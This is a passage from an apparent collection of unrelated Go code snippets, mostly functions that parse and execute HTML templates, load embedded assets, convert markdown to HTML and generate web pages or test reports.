e.style,\n\t\t\"GoCode\": template.HTML(goCode.String()),\n\t}\n\tif err := e.goTmpl.Execute(htmlContent, data); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\thtmlName := fmt.Sprintf(\"%s_step_%04d%s_go.html\", funcName, step, subStep)\n\thtmlPath := filepath.Join(e.outputDir, htmlName)\n\tdbg.Printf(\"creating file %q\", htmlPath)\n\tif err := ioutil.WriteFile(htmlPath, htmlContent.Bytes(), 0644); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\treturn nil\n}", "func templatesOld_cartHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/old_cart.html\")\n\tname := \"templates/old_cart.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func loveMountains(w http.ResponseWriter, r *http.Request) {\n\t// Build path to template\n\ttmplPath := filepath.Join(templatesDir, \"love-mountains.html\")\n\t// Load template from disk\n\ttmpl := template.Must(template.ParseFiles(tmplPath))\n\t// Inject data into template\n\tdata := \"Cadallac Mountain\"\n\ttmpl.Execute(w, data)\n}", "func rootHandler(w http.ResponseWriter, r *http.Request) {\r\n\t// Parsea la plantilla root.html \r\n\tif t, err := template.ParseFiles(filepath.Join(templates, \"root.html\")); err != nil {\r\n\t\t// Se ha presentado un error\r\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\r\n\t} else {\r\n\t\t// retorna la respuesta al cliente por medio de t.Execute\r\n\t\tt.Execute(w, nil)\r\n\t}\r\n}", "func main() {\n\t// go through each directory in go using os package\n\thtmlFiles := []string{}\n\toutputFolder := \"gh-pages\"\n\treg := []string{\"rm\", \"-rf\", outputFolder}\n\tcmd := strings.Join(reg[:], \" \")\n\n\ttmpl := `\n\t<html>\n\t\t<head>\n\t\t\t<title>List of Matlab Reports and Files</title>\n\t\t</head>\n\t\t<body>\n\t\t\t<h1>List of Files</h1>\n\t\t\t<ul>\n\t\t\t{{ range . }}\n\t\t\t\t<li><a href={{.}}>{{ . }}</a></li>\n\t\t\t{{ end }}\n\t\t\t</ul>\n\t\t</body>\n\t</html>\n\t`\n\tscript.IfExists(outputFolder).Exec(cmd).Stdout()\n\tscript.FindFiles(\".\").FilterScan(func(line string, w io.Writer) {\n\t\t// if line contains html print it\n\t\tif strings.Contains(line, \".html\") || strings.Contains(line, \".pdf\") {\n\t\t\tfmt.Fprintf(w, \"scanned line: %q\\n\", line)\n\t\t\thtmlFiles = append(htmlFiles, line)\n\t\t}\n\t}).Stdout()\n\n\tfmt.Println(htmlFiles)\n\t// create html directory\n\tscript.Exec(\"mkdir \" + outputFolder).Stdout()\n\n\t// for each html file\n\tfor _, file := range htmlFiles {\n\t\treg = []string{\"cp\", file, outputFolder}\n\t\tcmd = strings.Join(reg[:], \" \")\n\t\t// copy file to html directory\n\t\tscript.Exec(cmd).Stdout()\n\t}\n\n\t// move ads.txt to html directory\n\tscript.Exec(\"mv ads.txt \" + outputFolder).Stdout()\n\n\tt, err := template.New(\"files\").Parse(tmpl)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfile, err := os.Create(outputFolder + \"/index.html\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tdefer file.Close()\n\t// remove outputFolder from htmlFiles\n\tfor i, file := range htmlFiles {\n\t\t// get basename of file\n\t\tbaseName := filepath.Base(file)\n\t\thtmlFiles[i] = baseName\n\t}\n\terr = t.Execute(file, htmlFiles)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n}", "func templatesRegisterHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/register.html\")\n\tname := \"templates/register.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func Index(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n p, _ := loadPage(\"/src/github.com/mrgirlyman/watcher/frontman/build/index.html\")\n\n fmt.Fprintf(w, string(p.Body))\n // log.Fatal(err)\n\n // if (err != nil) {\n // fmt.Fprintf(w, string(p.Body))\n // } else {\n // fmt.Fprintf(w, \"Error reading index.html\")\n // }\n}", "func _html(ns Nodes, outer bool) string {\n\tif len(ns) == 0 {\n\t\treturn \"\"\n\t}\n\twr := w{}\n\tif outer {\n\t\thtml.Render(&wr, ns[0].Node)\n\t} else {\n\t\tfor _, v := range ns[0].Node.Child {\n\t\t\thtml.Render(&wr, v)\n\t\t}\n\t}\n\treturn wr.s\n}", "func init_html(srvaddr string) {\n\n\tsrvaddr = strings.ToLower(srvaddr)\n\n\tif !strings.HasPrefix(srvaddr, \"http://\") {\n\t\tsrvaddr = \"http://\" + srvaddr\n\t}\n\n\tif !strings.HasSuffix(srvaddr, \"/\") {\n\t\tsrvaddr = srvaddr + \"/\"\n\t}\n\n\tDOCHTML = bytes.ReplaceAll(DOCHTML, []byte(\"$$srvaddr$$\"), []byte(srvaddr))\n\tDOCHTML = bytes.ReplaceAll(DOCHTML, []byte(\"$$version$$\"), []byte(VERSION))\n}", "func serveTemplates(w http.ResponseWriter, r *http.Request) {\n\tlp := filepath.Join(\"static/templates\", \"layout.html\")\n\tfp := filepath.Join(\"static/templates\", \"sample.html\")\n\ttem, err := template.ParseFiles(lp, fp)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\terr = tem.ExecuteTemplate(w, \"layout\", nil)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n}", "func Source_() HTML {\n return Source(nil)\n}", "func mainPage(w http.ResponseWriter, r *http.Request) {\n\n\t// Pick an image if there are images to pick from (otherwise 404)\n\tfile := \"assets/404.jpg\"\n\tif len(images) > 0 {\n\t\tfile = pickRandom()\n\t} else {\n\t\t// TODO use a different image to say there are no images\n\t}\n\n\t// Read the code in page.html\n\thtml, err := ioutil.ReadFile(\"page.html\")\n\terrFail(err) // it's bad if you can't read the GUI's code\n\n\t// Replace variables in the HTML with current values\n\thtml = bytes.Replace(html, []byte(\"RANDOM\"), []byte(file), 1)\n\thtml = bytes.Replace(html, []byte(\"FILENAME\"), []byte(file), 1)\n\thtml = bytes.Replace(html, []byte(\"FOLDER\"), []byte(folder), 1)\n\n\t// Serve the finished page up\n\tw.Write(html)\n}", "func creaHTMLCodigos(codigos, codigosval []string) string {\n\thtmlcodigos := ``\n\tfor i := 0; i < len(codigos); i++ {\n\t\thtmlcodigos += `<tr><td><input type=\"hidden\" class=\"form-control\" value=\"\"><input type=\"text\" class=\"form-control\" name=\"Codigos\" value=\"` + codigos[i] + `\" readonly></td>\n\t\t\t\t\t<td><input type=\"text\" class=\"form-control\" name=\"Valcodigos\" value=\"` + codigosval[i] + `\" readonly></td>\n\t\t\t\t\t<td><button type=\"button\" class=\"btn btn-danger deleteButton\"><span class=\"glyphicon glyphicon-trash btn-xs\"></span></button></td>\n\t\t\t\t\t</tr>`\n\t}\n\treturn htmlcodigos\n}", "func toHtml(fname string) string {\n\treturn strings.Replace(fname, \".md\", \".html\", -1)\n}", "func templatesHomeHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/home.html\")\n\tname := \"templates/home.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func (r *Recipe) parseHTML() (rerr error) {\n\tif r == nil {\n\t\tr = &Recipe{}\n\t}\n\tif r.FileContent == \"\" || r.FileName == \"\" {\n\t\trerr = fmt.Errorf(\"no file loaded\")\n\t\treturn\n\t}\n\n\tr.Lines, rerr = getIngredientLinesInHTML(r.FileContent)\n\treturn r.parseRecipe()\n\n}", "func (rw *RW) WriteHTML(fileName string) (err error) {\n\tfile ,err := os.Open(\"views/\"+fileName)\n\tif err != nil {\n\t\treturn\n\t}\n\tdefer file.Close()\n\tfileBytes ,err := ioutil.ReadAll(file)\n\tif err != nil {\n\t\treturn\n\t}\n\n\trw.W.WriteHeader(200)\n\t_,err = rw.W.Write(fileBytes)\n\treturn\n}", "func writeHTML(domain, pkg, source, filename string) error {\n\tdata, err := generateHTML(domain, pkg, source)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = os.MkdirAll(filepath.Dir(filename), 0755)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn ioutil.WriteFile(filename, data, 0666)\n}", "func (is *infosec) html(page *Page, els element) {\n\tis.Map.html(page, nil)\n\tels.setMeta(\"isInfosec\", true)\n\n\t// not in an infobox{}\n\t// FIXME: do not produce this warning if infosec{} is in a variable\n\tif is.parentBlock().blockType() != \"infobox\" {\n\t\tis.warn(is.openPosition(), \"infosec{} outside of infobox{} does nothing\")\n\t\treturn\n\t}\n\n\t// inject the title\n\tif is.blockName() != \"\" {\n\t\tis.mapList = append([]*mapListEntry{{\n\t\t\tkey: \"_infosec_title_\",\n\t\t\tmetas: map[string]bool{\"isTitle\": true},\n\t\t\tvalue: page.Fmt(is.blockName(), is.openPosition()),\n\t\t}}, is.mapList...)\n\t}\n\n\tinfoTableAddRows(is, els, page, is.mapList)\n}", "func main(){\n\thttp.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request){\n\t\t//templates es la variable de arriba var templates\n\t\terr:=templates.ExecuteTemplate(w,\"registro\", nil) //resgistro corresponde al define en el archivo registro\n\n\t\tif err!=nil{\n\t\t\tpanic(err)\n\t\t}\n\t})\n\n\thttp.ListenAndServe(\"localhost:3000\",nil)\n}", "func projectWebpage(res http.ResponseWriter, req *http.Request) {\n\t// establish the webpage by parsing the index file\n\ttpl, err := template.ParseFiles(\"index.html\")\n\tif err != nil { // if index.html does not exist, give user a error\n\t\tlog.Fatalln(err) // stops program if file does not exist\n\t}\n\ttpl.Execute(res, nil) // execute the html file\n}", "func (VS *Server) design(c *gin.Context) {\n\trender(c, gin.H{}, \"presentation-design.html\")\n}", "func templatesItemHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/item.html\")\n\tname := \"templates/item.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func loadTemplate() (*template.Template, error) {\n\tt := template.New(\"\")\n\tfor name, file := range Assets.Files {\n\t\tif file.IsDir() || !strings.HasSuffix(name, \".gohtml\") {\n\t\t\tcontinue\n\t\t}\n\t\th, err := ioutil.ReadAll(file)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tt, err = t.New(name).Parse(string(h))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn t, nil\n}", "func main() {\n out, _ := os.Create(\"error-template.go\")\n out.Write([]byte(\"// generated by go run scripts/embed-template.go; DO NOT EDIT\\n\\n\"))\n out.Write([]byte(\"package main\\n\\nconst (\\n\"))\n out.Write([]byte(\"errorTemplate = `\"))\n f, _ := os.Open(\"error-template.html\")\n io.Copy(out, f)\n out.Write([]byte(\"`\\n\"))\n out.Write([]byte(\")\\n\"))\n}", "func rootHandler(w http.ResponseWriter, r *http.Request) {\n\t//fmt.Fprintf(w, \"<h1>Hello All</h1>\")\n\tt,_ := template.ParseFiles(\"root.html\")\n\tt.Execute(w, nil)\n\n}", "func renderPage(logger *Logger, config *Config, loadedPlugins map[string]pluginWithMeta, page *Page) {\n\tfor name, plugin := range loadedPlugins {\n\t\tif plugin.TitleHook != nil {\n\t\t\tpage.logger = logger.PluginPrefix(name)\n\t\t\tpage.title = plugin.TitleHook(plugin.meta, page)\n\t\t}\n\t}\n\tpage.logger = logger\n\n\tdata := make(map[string]interface{})\n\tdata[\"Page\"] = page\n\tfuncs := make(map[string]interface{})\n\n\tfor name, plugin := range loadedPlugins {\n\t\tpage.logger = logger.PluginPrefix(name)\n\t\tif plugin.TemplatingHook != nil {\n\t\t\tpluginData, pluginFuncs := plugin.TemplatingHook(plugin.meta, page)\n\t\t\tdata[name] = pluginData\n\t\t\tfor k, v := range pluginFuncs {\n\t\t\t\tfuncs[name+\"_\"+k] = v\n\t\t\t}\n\t\t}\n\t}\n\tpage.logger = logger\n\n\tvar head = \"\"\n\tvar before = \"\"\n\tvar after = \"\"\n\n\tfor name, plugin := range loadedPlugins {\n\t\tpage.logger = logger.PluginPrefix(name)\n\t\tif plugin.RenderHook != nil {\n\t\t\tpluginHead, pluginBefore, pluginAfter := plugin.RenderHook(plugin.meta, page)\n\t\t\thead += pluginHead\n\t\t\tbefore += pluginBefore\n\t\t\tafter += pluginAfter\n\t\t}\n\t}\n\tpage.logger = logger\n\n\tif t == nil {\n\t\tlogger.Debug(\"base template not initalized\")\n\t\topenTemplate(logger)\n\t}\n\n\textensions := parser.CommonExtensions | parser.AutoHeadingIDs\n\tparser := parser.NewWithExtensions(extensions)\n\n\thtmlFlags := html.CommonFlags\n\topts := html.RendererOptions{Flags: htmlFlags}\n\trenderer := html.NewRenderer(opts)\n\n\tt, err := t.Clone()\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to clone base template:\", err.Error())\n\t}\n\n\t_, err = t.New(\"__head__\").Parse(head)\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to parse __head__ template:\", err.Error())\n\t}\n\t_, err = t.New(\"__beforeContent__\").Parse(before)\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to parse __beforeContent__ template:\", err.Error())\n\t}\n\t_, err = t.New(\"__content__\").Parse(string(markdown.ToHTML([]byte(page.Content()), parser, renderer)))\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to parse __content__ template:\", err.Error())\n\t}\n\t_, err = t.New(\"__afterContent__\").Parse(after)\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to parse __afterContent__ template:\", err.Error())\n\t}\n\n\tpath := filepath.Join(config.OutputFolder, page.Slug(), \"index.html\")\n\terr = os.MkdirAll(filepath.Dir(path), os.ModeDir)\n\tif err != nil {\n\t\tlogger.Fatal(\"could not create directory structure for output file:\", err.Error())\n\t}\n\n\tout, err := os.Create(path)\n\tif err != nil {\n\t\tlogger.Fatal(\"could not open the output file:\", err.Error())\n\t}\n\tdefer out.Close()\n\n\terr = t.Funcs(funcs).Execute(out, data)\n\tif err != nil {\n\t\tlogger.Fatal(\"failed to execute template:\", err.Error())\n\t}\n}", "func outHTMLConfig(config *MainConfig, fileFunc FileResultFunc, packInfos []PackageInfo, fileLinks []FileLink) {\n\n\t// struct pack DocConfig needed by menu name\n\tmenuMDs := make([]MenuMarkdown, 0, 1)\n\tmenuFiles := make([]MenuFile, 0, 1)\n\n\tfor _, info := range packInfos {\n\t\tvar mm MenuMarkdown\n\t\tfindIndex := -1\n\n\t\tmenuMDsLen := len(menuMDs)\n\t\tfor i := 0; i < menuMDsLen; i++ {\n\t\t\ttempmm := menuMDs[i]\n\t\t\tif tempmm.MenuName == info.menuName {\n\t\t\t\tmm = tempmm\n\t\t\t\tfindIndex = i\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif -1 == findIndex {\n\t\t\tmm = MenuMarkdown{}\n\t\t\tmm.MenuName = info.menuName\n\t\t\tmm.Version = config.currentVersion\n\n\t\t\tmm.List = make([]PackageInfo, 0, len(packInfos))\n\t\t\tmm.List = append(mm.List, info)\n\n\t\t\tmenuMDs = append(menuMDs, mm)\n\t\t} else {\n\t\t\tmm.List = append(mm.List, info)\n\t\t\tmenuMDs[findIndex] = mm\n\t\t}\n\t}\n\n\tfor _, file := range fileLinks {\n\t\tvar mf MenuFile\n\t\tfindIndex := -1\n\n\t\tmenuFilesLen := len(menuFiles)\n\t\tfor i := 0; i < menuFilesLen; i++ {\n\t\t\ttempmf := menuFiles[i]\n\t\t\tif tempmf.MenuName == file.menuName {\n\t\t\t\tmf = tempmf\n\t\t\t\tfindIndex = i\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif -1 == findIndex {\n\t\t\tmf = MenuFile{}\n\t\t\tmf.MenuName = file.menuName\n\t\t\tmf.Version = config.currentVersion\n\n\t\t\tmf.List = make([]FileLink, 0, len(fileLinks))\n\t\t\tmf.List = append(mf.List, file)\n\n\t\t\tmenuFiles = append(menuFiles, mf)\n\t\t} else {\n\t\t\tmf.List = append(mf.List, file)\n\t\t\tmenuFiles[findIndex] = mf\n\t\t}\n\t}\n\n\tconfigPath := filepath.Join(config.Outpath, FILE_NAME_HTML_CONFIG_JSON)\n\n\tdocConfig := readDocConifg(configPath)\n\n\tdocConfig.ContentJson = FILE_NAME_CONTENT_JSON\n\tdocConfig.IntroMd = FILE_NAME_INTRO_MD\n\tdocConfig.AboutMd = FILE_NAME_ABOUT_MD\n\tdocConfig.Languages = config.Languages\n\tdocConfig.LinkRoot = config.CodeLinkRoot\n\tdocConfig.AppendPath = config.OutAppendPath\n\n\t// rebuild struct remove correspond version info\n\tcurrentVersion := config.currentVersion\n\n\ttempVersions := make([]string, 0, 1)\n\ttempVersions = append(tempVersions, currentVersion)\n\tfor _, v := range docConfig.Versions {\n\t\tif v != currentVersion {\n\t\t\ttempVersions = append(tempVersions, v)\n\t\t}\n\t}\n\tdocConfig.Versions = tempVersions\n\n\t// markdownds and files\n\tfor _, v := range docConfig.Markdowns {\n\t\tif v.Version != currentVersion {\n\t\t\tmenuMDs = append(menuMDs, v)\n\t\t}\n\t}\n\tfor _, v := range docConfig.Files {\n\t\tif v.Version != currentVersion {\n\t\t\tmenuFiles = append(menuFiles, v)\n\t\t}\n\t}\n\tdocConfig.Markdowns = menuMDs\n\tdocConfig.Files = menuFiles\n\n\t// output config.json\n\tconfigData, err := json.MarshalIndent(docConfig, \"\", \"\\t\")\n\tif nil != err {\n\t\tfileFunc(configPath, ResultFileOutFail, err)\n\t} else {\n\t\terr := SFFileManager.WirteFilepath(configPath, configData)\n\t\tif nil != err {\n\t\t\tfileFunc(configPath, ResultFileOutFail, err)\n\t\t}\n\t}\n\n}", "func generateContent(o operations, dirFiles string, editName []string) {\n\tswitch o.optype {\n\tcase \"png\": // create pngs\n\t\tmp4File := dirFiles\n\t\tpngFile := editName[0][:len(editName[0])-7] + \"/png/\" + editName[1][:len(editName[1])-4] + \".png\"\n\t\tcmd := exec.Command(\"ffmpeg\", \"-y\", \"-ss\", \"0\", \"-t\", \"11\", \"-i\", mp4File, \"-filter_complex\", \"[0:v] palettegen\", pngFile)\n\t\tcmd.Run()\n\tcase \"gif\": // create gifs\n\t\tmp4File := dirFiles\n\t\tgifFile := editName[0][:len(editName[0])-7] + \"/png/\" + editName[1][:len(editName[1])-4] + \".gif\"\n\t\tcmd := exec.Command(\"ffmpeg\", \"-ss\", \"0\", \"-t\", \"11\", \"-i\", mp4File, \"-filter_complex\", \"[0:v] fps=24,scale=w=480:h=-1,split [a][b];[a] palettegen=stats_mode=single [p];[b][p] paletteuse=new=1\", gifFile)\n\t\tcmd.Run()\n\n\t\t// Move .gif to gif directory\n\t\tdestinationDirectory := editName[0][:len(editName[0])-7] + \"/gif\"\n\t\tcmd2 := exec.Command(\"mv\", gifFile, destinationDirectory)\n\t\tcmd2.Run()\n\tcase \"jpg\": // create jpgs\n\t\tfmt.Println(\"create jpgs\")\n\t\tjpgFolder := editName[0][:len(editName[0])-7] + \"/jpg/\" + editName[1][:len(editName[1])-4]\n\t\tcmd3 := exec.Command(\"mkdir\", jpgFolder)\n\t\tcmd3.Run()\n\n\t\tmp4File := dirFiles\n\t\tjpgFrames := editName[0][:len(editName[0])-7] + \"/jpg/\" + editName[1][:len(editName[1])-4] + \"/\" + editName[1][:len(editName[1])-4] + \"-frame-%04d.jpg\"\n\t\tdefer generateJpgs(mp4File, jpgFrames)\n\tcase \"histogram1\": // create histogram\n\t\tfmt.Println(\"create histo1\")\n\t\thisto1Folder := editName[0][:len(editName[0])-7] + \"/histogram\"\n\t\tcmd := exec.Command(\"mkdir\", histo1Folder)\n\t\tcmd.Run()\n\n\t\tpngFile := editName[0][:len(editName[0])-7] + \"/png/\" + editName[1][:len(editName[1])-4] + \".png\"\n\t\thisto1File := editName[0][:len(editName[0])-7] + \"/histogram/\" + editName[1][:len(editName[1])-4] + \".txt\"\n\t\tdefer generateHistogram1(pngFile, histo1File)\n\t}\n}", "func Index(w http.ResponseWriter, r *http.Request) {\r\n\tfiles := []string{\"templates/layout.html\", \"templates/navbar.html\", \"templates/upload.index.html\"}\r\n\tt, err := template.ParseFiles(files...)\r\n\tif err != nil {\r\n\t\tpanic(err)\r\n\t}\r\n\tt.ExecuteTemplate(w, \"layout\", \"\")\r\n}", "func handler(w http.ResponseWriter, r *http.Request) {\n\ttmpl := template.Must(template.ParseFiles(\"index.html\"))\n\tdata := page\n\ttmpl.Execute(w, data)\n}", "func main() {\n\tfmt.Println(\"*** START ***\")\n\n pathGen, _ := os.Getwd()\n pathRoo := strings.Replace(pathGen, \"/_gen\", \"\", -1)\n\tpathSrc := path.Join(pathRoo, \"/_src\")\n\tpathPst := path.Join(pathSrc, \"/posts\")\n\tpathTmp := path.Join(pathSrc, \"/templates\")\n\n\tfileTmp := GetFile(path.Join(pathTmp, \"post.html\"))\n\n\tProcessClean(pathRoo)\n\tProcessPosts(fileTmp, pathPst, pathRoo)\n\n\tfmt.Println(\"*** END ***\")\n}", "func HTMLRenderByPongo2(ctx *gin.Context, code int, filename string, data pongo2.Context) {\n\n\tcontentType := \"text/html; charset=utf-8\"\n\tvar template *pongo2.Template\n\tif gin.Mode() == \"debug\" {\n\t\ttemplate = pongo2.Must(pongo2.FromFile(filename))\n\t} else {\n\t\ttemplate = pongo2.Must(pongo2.FromCache(filename))\n\t}\n\n\thtml, err := template.Execute(data)\n\tif err != nil {\n\t\tctx.String(500, \"render template error:\"+err.Error())\n\t\treturn\n\t}\n\tctx.Data(code, contentType, []byte(html))\n}", "func Base_() HTML {\n return Base(nil)\n}", "func (m *Repository) Generals(w http.ResponseWriter, r *http.Request) {\n\trender.RenderTemplate(w, r, \"generals.page.gohtml\", &models.TemplateData{})\n}", "func Handler(w http.ResponseWriter, r *http.Request) {\n\tjsn := GetAsset(r, \"vango.json\") // Get the vango.json file\n\n\tvar vango Vango\n\tjson.Unmarshal([]byte(jsn), &vango)\n\n\tw.Header().Set(\"Content-Type\", \"text/html; charset=utf-8\")\n\n\tname := regexp.MustCompile(\"[@/]\").Split(strings.ToLower(strings.TrimPrefix(r.URL.Path, \"/\")), -1)[0] // Get the project name\n\tif len(name) >= 1 {\n\t\tfor i := range vango.Packages {\n\t\t\tif strings.EqualFold(vango.Packages[i].Name, name) {\n\t\t\t\tpkg := vango.Packages[i]\n\t\t\t\ttmpl := map[bool]string{\n\t\t\t\t\ttrue: \"_assets/templates/forward.gohtml\",\n\t\t\t\t\tfalse: \"_assets/templates/project.gohtml\",\n\t\t\t\t}[r.URL.Query().Get(\"go-get\") == \"1\"]\n\t\t\t\tpath := struct{ Path string }{Path: pkg.Path}\n\n\t\t\t\tvar git bytes.Buffer\n\t\t\t\ttemplate.Must(template.New(\"git\").Parse(pkg.Git)).Execute(&git, path)\n\n\t\t\t\tvar sources bytes.Buffer\n\t\t\t\ttemplate.Must(template.New(\"sources\").Parse(strings.Join(pkg.Sources, \" \"))).Execute(&sources, path)\n\n\t\t\t\tgh, err := url.Parse(git.String())\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\ttemplate.Must(template.New(\"webpage\").Parse(GetAsset(r, tmpl))).Execute(w, DataPack{\n\t\t\t\t\tLink: strings.Join([]string{r.Header.Get(\"x-forwarded-host\"), name}, \"/\"),\n\t\t\t\t\tGit: git.String(),\n\t\t\t\t\tGitHost: formatHost(map[bool]string{\n\t\t\t\t\t\ttrue: gh.Host,\n\t\t\t\t\t\tfalse: pkg.Host,\n\t\t\t\t\t}[pkg.Host == \"\"]),\n\t\t\t\t\tName: pkg.Name,\n\t\t\t\t\tSources: sources.String(),\n\t\t\t\t\tPrivate: pkg.Private,\n\t\t\t\t\tAbout: pkg.About,\n\t\t\t\t\tGenerator: vango.Generator,\n\t\t\t\t})\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\tfmt.Fprintf(w, \"404 - Page Not Found\")\n\t} else {\n\t\ttemplate.Must(template.New(\"webpage\").Parse(GetAsset(r, \"_assets/templates/index.gohtml\"))).Execute(w, vango)\n\t}\n}", "func test(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\t//title := \"edit\"\n\ttype data struct {\n\t\tTitle string\n\t\tBody string\n\t}\n\t//dataVal := data{\"hello\",\"test\"}\n\tt, _ := template.ParseFiles(\"edit.html\")\n\tt.Execute(w, nil)\n}", "func index(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\tasset, err := Asset(\"static/templates/index.html\")\n\tif err != nil {\n\t\tlog.Panic(\"Unable to read file from bindata: \", err)\n\t}\n\tfmt.Fprint(w, string(asset))\n}", "func getHTML(str string) template.HTML {\n\tmarkdown := string(blackfriday.Run([]byte(str)))\n\treturn template.HTML(markdown)\n}", "func generateHTMLReport(c *gin.Context,scrapeID string){\n\tjsonFile, err := os.Open(\"data/\" + scrapeID + \"_report.json\")\n\tif err!=nil{\n\t\tc.HTML(\n\t\t\thttp.StatusBadRequest,\n\t\t\t\"error.tmpl\",\n\t\t\tgin.H{\n\t\t\t\t\"err\": \"no report found!\",\n\t\t\t},\n\t\t)\n\t\treturn\n\t}\n\n\tdefer jsonFile.Close()\n\treportInBytes, err := ioutil.ReadAll(jsonFile)\n\tif err!=nil{\n\t\tc.HTML(\n\t\t\thttp.StatusBadRequest,\n\t\t\t\"error.tmpl\",\n\t\t\tgin.H{\n\t\t\t\t\"err\": \"Error while reading report\",\n\t\t\t},\n\t\t)\n\t\treturn\n\t}\n\n\tvar finalReport scraper.Report\n\t_ = json.Unmarshal(reportInBytes, &finalReport)\n\n\tc.HTML(\n\t\thttp.StatusOK,\n\t\t\"index.tmpl\",\n\t\tgin.H{\n\t\t\t\"scrape_id\": finalReport.ScrapeID,\n\t\t\t\"project_id\":finalReport.ProjectID,\n\t\t\t\"folder_threshold\":finalReport.FolderThreshold,\n\t\t\t\"folder_examples_count\":finalReport.FolderExamplesCount,\n\t\t\t\"patterns\":finalReport.Patterns,\n\t\t\t\"details\": finalReport.DetailedReport,\n\t\t},\n\t)\n\treturn\n\n}", "func Build(srcdir, dstdir string) error {\n\n\t// Get a slice of markdown files.\n\tmatches, err := filepath.Glob(srcdir + \"/*.md\")\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Convert markdown to HTML.\n\tfor _, md := range matches {\n\t\tdstFile := strings.Replace(filepath.Base(md), \".md\", \".html\", 1)\n\t\tlog.Printf(\"[DEBUG] markdown file src: %s\\n\", md)\n\t\tlog.Printf(\"[DEBUG] markdown file dst: %s/%s\\n\", dstdir, dstFile)\n\n\t\tdat, err := ioutil.ReadFile(md)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"[INFO] Error reading .md file: %s\\n\", err)\n\t\t}\n\n\t\t// TODO: Write full HTML webpage from **template** here.\n\t\terr = ioutil.WriteFile(filepath.Join(dstdir, dstFile), toHTML(dat), 0644)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func GenerateHTMLReport(totalTestTime, testDate string, testSummary []TestOverview, testSuiteDetails map[string]TestSuiteDetails) {\n\ttotalPassedTests := 0\n\ttotalFailedTests := 0\n\ttotalSkippedTests := 0\n\ttemplates := make([]template.HTML, 0)\n\tfor _, testSuite := range testSuiteDetails {\n\t\ttotalPassedTests = totalPassedTests + testSuite.PassedTests\n\t\ttotalFailedTests = totalFailedTests + testSuite.FailedTests\n\t\ttotalSkippedTests = totalSkippedTests + testSuite.SkippedTests\n\t\t// display testSuiteName\n\t\thtmlString := template.HTML(\"<div type=\\\"button\\\" class=\\\"collapsible\\\">\\n\")\n\t\tpackageInfoTemplateString := template.HTML(\"\")\n\n\t\tpackageInfoTemplateString = \"<div>{{.testsuiteName}}</div>\" + \"\\n\" + \"<div>Run Time: {{.elapsedTime}}m</div> \" + \"\\n\"\n\t\tpackageInfoTemplate, err := template.New(\"packageInfoTemplate\").Parse(string(packageInfoTemplateString))\n\t\tif err != nil {\n\t\t\tlog.Println(\"error parsing package info template\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\tvar processedPackageTemplate bytes.Buffer\n\t\terr = packageInfoTemplate.Execute(&processedPackageTemplate, map[string]string{\n\t\t\t\"testsuiteName\": testSuite.TestSuiteName + \"_\" + OS,\n\t\t\t\"elapsedTime\": fmt.Sprintf(\"%.2f\", testSuite.ElapsedTime),\n\t\t})\n\t\tif err != nil {\n\t\t\tlog.Println(\"error applying package info template: \", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\tif testSuite.Status == \"pass\" {\n\t\t\tpackageInfoTemplateString = \"<div class=\\\"collapsibleHeading packageCardLayout successBackgroundColor \\\">\" +\n\t\t\t\ttemplate.HTML(processedPackageTemplate.Bytes()) + 